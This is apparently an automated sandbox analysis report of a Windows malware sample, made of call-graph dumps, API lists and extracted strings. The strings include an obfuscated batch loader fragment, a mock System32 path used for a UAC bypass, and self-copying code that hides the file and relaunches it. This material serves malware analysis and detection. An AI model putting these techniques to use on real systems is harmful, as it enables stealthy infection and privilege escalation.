2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 * 16 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 ExitProcess 7533->7712 7713 2e06cdd-2e06cec call 2de48b0 7533->7713 7999 2e06716-2e06781 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 7534->7999 7713->7712 7728 2e06cf2-2e06fc5 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfd198 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de7e18 7713->7728 8133 2e072a2-2e074a3 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc call 2df7f48 7728->8133 8134 2e06fcb-2e0729d call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 7728->8134 8059 2e06786-2e0678d call 2df7be8 7999->8059 8099 2e05cb5-2e05cb8 8002->8099 8100 2e05cba-2e05f7c call 2df5aa8 call 2de4b90 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc RtlMoveMemory call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfa1c0 8002->8100 8062 2e044da-2e044e1 call 2df7be8 8003->8062 8069 2e06792-2e067fd call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8059->8069 8072 2e044e6-2e04551 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8062->8072 8129 2e06802-2e06823 call 2df7be8 GetCurrentProcess call 2df7968 8069->8129 8132 2e04556-2e0455d call 2df7be8 8072->8132 8099->8100 8638 2e05f81-2e05f98 call 2de36c4 8100->8638 8152 2e06828-2e06898 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8129->8152 8144 2e04562-2e04571 call 2de48b0 8132->8144 8133->7712 8134->8133 8162 2e047d5-2e04840 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8144->8162 8163 2e04577-2e045e2 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8144->8163 8233 2e0689d-2e068a4 call 2df7be8 8152->8233 8248 2e04845-2e0484c call 2df7be8 8162->8248 8245 2e045e7-2e045ee call 2df7be8 8163->8245 8247 2e068a9-2e06914 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8233->8247 8259 2e045f3-2e0465e call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8245->8259 8331 2e06919-2e06920 call 2df7be8 8247->8331 8262 2e04851-2e048bc call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8248->8262 8343 2e04663-2e0466a call 2df7be8 8259->8343 8346 2e048c1-2e048c8 call 2df7be8 8262->8346 8345 2e06925-2e06990 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8331->8345 8357 2e0466f-2e046da call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8343->8357 8428 2e06995-2e0699c call 2df7be8 8345->8428 8360 2e048cd-2e04938 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8346->8360 8441 2e046df-2e046e6 call 2df7be8 8357->8441 8444 2e0493d-2e04944 call 2df7be8 8360->8444 8443 2e069a1-2e069b4 8428->8443 8456 2e046eb-2e04756 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8441->8456 8450 2e069b6-2e069b9 8443->8450 8451 2e069bb-2e06a3e call 2de49bc call 2dfc5bc call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8443->8451 8459 2e04949-2e049b4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8444->8459 8450->8451 8561 2e06a43-2e06a4a call 2df7be8 8451->8561 8539 2e0475b-2e04762 call 2df7be8 8456->8539 8542 2e049b9-2e049c0 call 2df7be8 8459->8542 8553 2e04767-2e047c4 call 2de4824 call 2de4964 call 2de4d38 call 2de4da4 call 2de4728 8539->8553 8556 2e049c5-2e04a30 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8542->8556 8616 2e047c9-2e047d0 call 2dfc3f8 8553->8616 8626 2e04a35-2e04a3c call 2df7be8 8556->8626 8573 2e06a4f-2e06aba call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8561->8573 8641 2e06abf-2e06ac6 call 2df7be8 8573->8641 8616->8162 8636 2e04a41-2e04aac call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8626->8636 8682 2e04ab1-2e04ab8 call 2df7be8 8636->8682 8651 2e06acb-2e06b36 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8641->8651 8690 2e06b3b-2e06b4f call 2df7be8 EnumSystemLocalesA 8651->8690 8688 2e04abd-2e04b28 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8682->8688 8715 2e04b2d-2e04b34 call 2df7be8 8688->8715 8690->7533 8719 2e04b39-2e04bc3 call 2de3694 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8715->8719 8747 2e04bc8-2e04bcf call 2df7be8 8719->8747 8751 2e04bd4-2e04cbc call 2de4824 call 2de2f08 call 2de794c call 2de47b0 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8747->8751 8800 2e04cc1-2e04cc8 call 2df7be8 8751->8800 8804 2e04ccd-2e04d38 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8800->8804 8828 2e04d3d-2e04d44 call 2df7be8 8804->8828 8832 2e04d49-2e04df0 call 2de2f08 call 2de794c call 2de47b0 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8828->8832 8871 2e04df5-2e04dfc call 2df7be8 8832->8871 8875 2e04e01-2e04e6c call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8871->8875 8899 2e04e71-2e04e78 call 2df7be8 8875->8899 8903 2e04e7d-2e04eca call 2de4824 call 2de4964 call 2de4698 8899->8903 8915 2e04ecf-2e04edc call 2df4d90 8903->8915 8918 2e04edf-2e04ef6 call 2de36c4 8915->8918
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                      • Part of subcall function 02DFC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
                                                                                                                                                      • Part of subcall function 02DFC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
                                                                                                                                                      • Part of subcall function 02DFC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
                                                                                                                                                      • Part of subcall function 02DFC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
                                                                                                                                                      • Part of subcall function 02DE7E18: GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
                                                                                                                                                    • Sleep.KERNEL32(00001770,UacScan,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC), ref: 02E03094
                                                                                                                                                      • Part of subcall function 02DFC368: RtlInitUnicodeString.N(?,?,00000000,02DFC3E2), ref: 02DFC390
                                                                                                                                                      • Part of subcall function 02DFC368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3A6
                                                                                                                                                      • Part of subcall function 02DFC368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3C5
                                                                                                                                                    • WinExec.KERNEL32(00000000,02E09524), ref: 02E0436D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                                                    • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
                                                                                                                                                    • API String ID: 102611719-2667577771
                                                                                                                                                    • Opcode ID: 2c25f64cffccf9540698eff47645135ec74a36ef42b476d0cbf1b4ddbde53344
                                                                                                                                                    • Instruction ID: bc0795ca9d2b010b4a4a5db7eccd1a92b700ea1a2111ab3b25d9a4a9bef59c3c
                                                                                                                                                    • Opcode Fuzzy Hash: 2c25f64cffccf9540698eff47645135ec74a36ef42b476d0cbf1b4ddbde53344
                                                                                                                                                    • Instruction Fuzzy Hash: 3053FA34A902598BEF20FB65DC80EDD73B6EB85700F5095E5A10AA7354DE70AEC2CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 9338 1568cdf9-1568ce14 call 156bbad6 9341 1568ce60-1568ce7b call 1568da34 call 15681f13 9338->9341 9342 1568ce16-1568ce36 call 15681f04 CreateDirectoryW call 1568915b 9338->9342 9349 1568ce80-1568cea0 call 15681f09 call 15681f04 call 156bf954 9341->9349 9350 1568ce3b-1568ce5e call 15683014 call 15681f13 call 15681f09 9342->9350 9363 1568cebf-1568ced4 call 15681f04 CopyFileW 9349->9363 9364 1568cea2-1568ceb5 call 15681f04 call 1568cd0d 9349->9364 9350->9349 9370 1568cf99-1568cfb1 call 15681f04 call 1568cd0d 9363->9370 9371 1568ceda-1568cedf 9363->9371 9375 1568ceb7-1568cebe 9364->9375 9385 1568cfdf-1568cfe4 9370->9385 9386 1568cfb3-1568cfce call 15681f04 SetFileAttributesW call 156bbad6 9370->9386 9371->9370 9373 1568cee5-1568cef4 call 156bbad6 9371->9373 9380 1568cf49-1568cf58 call 1568da34 call 15681f13 9373->9380 9381 1568cef6-1568cf47 call 1568da34 call 15681f13 call 15681f09 call 1568915b call 15683014 call 15681f13 call 15681f09 9373->9381 9402 1568cf5c-1568cf88 call 15681f09 call 15681f04 CreateDirectoryW call 15681f04 CopyFileW 9380->9402 9381->9402 9388 1568cfe6-1568d022 call 1568417e call 1569bc5e call 15681f04 call 15693814 call 15681f09 9385->9388 9389 1568d027-1568d054 CloseHandle call 15681f04 ShellExecuteW 9385->9389 9386->9385 9410 1568cfd0-1568cfdd call 15681f04 SetFileAttributesW 9386->9410 9388->9389 9405 1568d060-1568d062 ExitProcess 9389->9405 9406 1568d056-1568d05b call 1568d069 9389->9406 9402->9370 9432 1568cf8a-1568cf8d call 15689057 9402->9432 9421 1568cf92-1568cf94 9406->9421 9410->9385 9421->9375 9432->9421
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 1568CE07
                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,156F50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 1568CE20
                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\fu56fbrtn8.exe,00000000,00000000,00000000,00000000,00000000,?,156F50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 1568CED0
                                                                                                                                                    • _wcslen.LIBCMT ref: 1568CEE6
                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 1568CF6E
                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\fu56fbrtn8.exe,00000000,00000000), ref: 1568CF84
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 1568CFC3
                                                                                                                                                    • _wcslen.LIBCMT ref: 1568CFC6
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 1568CFDD
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,156F50E4,0000000E), ref: 1568D02D
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000001), ref: 1568D04B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1568D062
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                    • String ID: 6$C:\Users\user\Desktop\fu56fbrtn8.exe$del$open
                                                                                                                                                    • API String ID: 1579085052-2548682020
                                                                                                                                                    • Opcode ID: abf259eee7ee940377874ab58b072b0e5394c0a366cf989b9331b30f746ec6ce
                                                                                                                                                    • Instruction ID: 04c36ce507a6fde2bc9f80cb009ef99de86cb2db667cb76038fadc072b7f349a
                                                                                                                                                    • Opcode Fuzzy Hash: abf259eee7ee940377874ab58b072b0e5394c0a366cf989b9331b30f746ec6ce
                                                                                                                                                    • Instruction Fuzzy Hash: BA51E76571A340ABE618EB24DC60E6F77EDAF94625F80040DF5458B380EF64BD04C3EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02E04EFE Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 941processCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 9437 2e04efe-2e0565b call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4964 call 2de4698 call 2dfd318 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 9648 2e06190-2e0638f call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 9437->9648 9649 2e05661-2e05cb3 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de47b0 call 2de4964 WinExec call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4964 call 2de4698 call 2df9e70 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de3694 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 9437->9649 9767 2e06b54-2e06cd7 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 9648->9767 9768 2e06395-2e069b4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de2ee0 call 2de2f08 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 GetCurrentProcess call 2df7968 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 9648->9768 10212 2e05cb5-2e05cb8 9649->10212 10213 2e05cba-2e05f98 call 2df5aa8 call 2de4b90 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc RtlMoveMemory call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfa1c0 call 2de36c4 9649->10213 9901 2e074a8-2e08b96 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 * 16 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 